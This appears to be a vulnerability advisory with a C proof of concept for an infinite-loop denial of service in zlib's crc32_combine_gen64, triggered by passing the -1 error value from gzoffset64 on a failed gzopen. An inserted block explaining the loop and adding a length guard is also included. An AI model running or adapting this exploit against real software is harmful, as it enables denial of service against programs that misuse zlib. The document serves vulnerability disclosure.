=============================================================================================================================================
| # Title     : zlib via Infinite Loop in crc32_combine_gen64 Denial of Service                                                              |
| # Author    : indoushka                                                                                                                    |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                             |
| # Vendor    : https://github.com/madler/zlib                                                                                               |
=============================================================================================================================================

[+] Summary :

A vulnerability in zlib versions before 1.3.2 can lead to a Denial of Service (DoS) condition due to an infinite loop in the crc32_combine_gen64() function. The issue occurs when an invalid length value (specifically -1, interpreted as 0xFFFFFFFFFFFFFFFF in unsigned 64-bit form) is passed to the function. This can happen if a program:

  1. Calls gzopen() with invalid parameters.
  2. Fails to properly validate the returned gzFile pointer.
  3. Calls gzoffset64() on the resulting NULL pointer.
  4. Passes the -1 it gets back, unvalidated, to crc32_combine_gen64() as a length.

When this malformed value is processed, the internal bitwise loop in crc32_combine_gen64() never terminates, resulting in 100% CPU consumption. This vulnerability does not allow remote code execution or privilege escalation. The impact is limited to resource exhaustion (CPU) within applications that fail to validate zlib function return values.
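The following is an added, constructed illustration and is not part of the original advisory or of zlib's code: it models a length-driven bit-scanning loop of the kind the summary describes, shows why the -1 error sentinel never lets it terminate under signed arithmetic shift, contrasts the unsigned reinterpretation, and adds the caller-side guard that rejects the sentinel before any loop runs. STEP_BOUND and the function names are assumptions chosen for this example.

```c
#include <stdio.h>
#include <stdint.h>

#define STEP_BOUND     200   /* assumed cap so the hang can be observed instead of suffered */
#define NO_TERMINATION (-1)  /* loop still running when the bound was hit */
#define REJECTED       (-2)  /* guard refused the length before any loop ran */

/* Constructed model of a length-driven bit-scanning loop: each pass consumes one bit of
   len with a right shift and stops once no bits remain. With a signed operand the shift
   is arithmetic on common compilers, so a negative len keeps its sign bit and never hits 0. */
int signed_shift_steps(int64_t len)
{
    int steps = 0;
    while (len) {
        len >>= 1;
        if (++steps > STEP_BOUND)
            return NO_TERMINATION;
    }
    return steps;
}

/* Same loop over the unsigned reinterpretation: 0xFFFFFFFFFFFFFFFF ends after 64 passes,
   so the hang comes from signed shift semantics, not from the size of the value. */
int unsigned_shift_steps(int64_t len)
{
    uint64_t bits = (uint64_t)len;
    int steps = 0;
    while (bits) {
        bits >>= 1;
        steps++;
    }
    return steps;
}

/* Defensive wrapper: a combine length is a byte count and can never be negative, so the
   -1 error sentinel from a failed gz call is refused here instead of reaching the loop. */
int validated_shift_steps(int64_t len)
{
    return len < 0 ? REJECTED : signed_shift_steps(len);
}

int main(void)
{
    int64_t lens[] = { 0, 1000, -1 };   /* constructed inputs; -1 is the gzoffset64 error value */
    for (int i = 0; i < 3; i++)
        printf("len=%lld unguarded=%d unsigned=%d guarded=%d\n", (long long)lens[i],
               signed_shift_steps(lens[i]), unsigned_shift_steps(lens[i]),
               validated_shift_steps(lens[i]));
    return 0;
}
```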
[+] POC :

#include <stdio.h>
#include <stdlib.h>
#include <zlib.h>

/* Create a plain-text file under a .gz name. Its contents never matter,
   because gzopen() fails on the empty mode string before reading anything. */
void create_dummy_file(const char* filename)
{
    FILE *fp = fopen(filename, "w");
    if (!fp) {
        perror("Failed to create file");
        exit(1);
    }
    fprintf(fp, "This is a test file for the vulnerability exploit");
    fclose(fp);
    printf("[+] Test file created: %s\n", filename);
}

int main(int argc, char *argv[])
{
    const char *target_file = "poc_test.gz";

    printf("========================================\n");
    printf("       zlib Exploit by indoushka        \n");
    printf("  DoS via Infinite Loop in crc32_combine_gen64\n");
    printf("========================================\n\n");

    create_dummy_file(target_file);

    /* An empty mode string is neither read, write nor append, so gzopen() returns NULL. */
    printf("[*] Attempting to open the file incorrectly...\n");
    gzFile file = gzopen(target_file, "");
    if (file == NULL) {
        printf("[OK] Success: gzopen returned NULL as expected\n");
    } else {
        printf("[!] Failure: gzopen did not return NULL (unexpected)\n");
        gzclose(file);
        return 1;
    }

    /* gzoffset64() reports the NULL handle with its error sentinel, -1. */
    printf("[*] Calling gzoffset64 on a NULL pointer...\n");
    z_off64_t malicious_len = gzoffset64(file);
    printf("[*] Value returned from gzoffset64: %lld (0x%llx)\n",
           (long long)malicious_len, (unsigned long long)malicious_len);
    if (malicious_len == (z_off64_t)-1) {
        printf("[OK] Success: Obtained value -1 (0xFFFFFFFFFFFFFFFF)\n");
    }

    /* The unchecked sentinel is passed on as a length; on affected versions this call never returns. */
    printf("\n[!] Calling crc32_combine_gen64 with the poisoned value...\n");
    printf("[!] This will cause the program to enter an infinite loop!\n");
    printf("[!] CPU consumption starts now... Press Ctrl+C to stop\n");
    printf("----------------------------------------\n");
    uLong result = crc32_combine_gen64(malicious_len);
    printf("CRC Result: %lu\n", result);

    gzclose(file);
    remove(target_file);
    return 0;
}

Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================